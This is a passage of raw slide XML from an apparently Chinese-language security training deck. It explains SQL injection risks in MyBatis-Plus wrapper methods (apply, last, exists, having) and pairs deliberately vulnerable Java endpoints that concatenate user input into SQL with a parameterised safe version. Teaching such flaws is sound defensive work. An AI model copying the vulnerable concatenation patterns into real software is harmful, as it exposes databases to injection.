              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>wrapper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>已进行了相关的预编译处理。例如</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常见的</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注入场景，均进行了预编译处理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>.</a:t>
            </a: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9140964"/>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常见注入场景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条件构造器常见注入场景</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>Apply</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apply(String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>applySql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>, Object... params)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>apply(</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applySql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>, Object... params)</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拼接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>sql</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该方法可用于数据库函数 动态入参的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>params</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>对应前面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>applySql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>内部的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>{index}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>部分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这样是不会有</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注入风险的</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反之会有</a:t>
            </a:r>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apply()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>直接拼接</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@RequestMapping("/applyvuln")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>public Tutorial </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>mybatisapplyvuln</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author,String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t> title) {</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wrapper.eq</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author",author</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>).apply("title="+title);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>    Tutorial </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>tutorial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>tutorialMapper.selectOne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>(wrapper);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>    return tutorial;</a:t>
            </a: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1726287"/>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{index}params</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>进行预编译处理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不存在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@RequestMapping("/applysec")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>public Tutorial </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>mybatisapplysec</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author,String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t> title) {</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wrapper.eq</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author",author</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>).apply("title={0}",title);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>    Tutorial </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>tutorial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>tutorialMapper.selectOne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>(wrapper);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>    return tutorial;</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>last(String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>lastSql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last(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lastSql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>无视优化规则直接拼接到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea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rPr>
              <a:t>的最后</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注：只能调用一次</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多次调用以最后一次为准 ，若相关内容用户可控，则存在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@RequestMapping("/lastvuln")</a:t>
            </a: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mybatislastvuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>(String column) {</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wrapper.last</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>("order by " + column);</a:t>
            </a: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p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>    return list;</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exists/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>notExists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exists(String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>existsSql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exists(</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existsSql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notExists</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notExistsSql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notExists</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notExistsSql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>拼接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>EXISTX / NOT EXISTS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注：若</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>existsSql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>notExistsSql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>中有关内容用户可控，则存在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@RequestMapping("/existsvuln")</a:t>
            </a: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mybatisexistsvuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>(String title) {</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wrapper.exists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>("select title from tutorials where title = " + title);</a:t>
            </a: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p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>    return list;</a:t>
            </a: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having</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>having(String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>sqlHaving</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>, Object... params)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>having(</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sqlHaving</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>, Object... params)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>HAVING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用于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>Having</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>查询，一般用配合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>groupby</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>在对分组统计函数进行过滤的场景中</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>注：与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>apply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>一样，动态入参的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
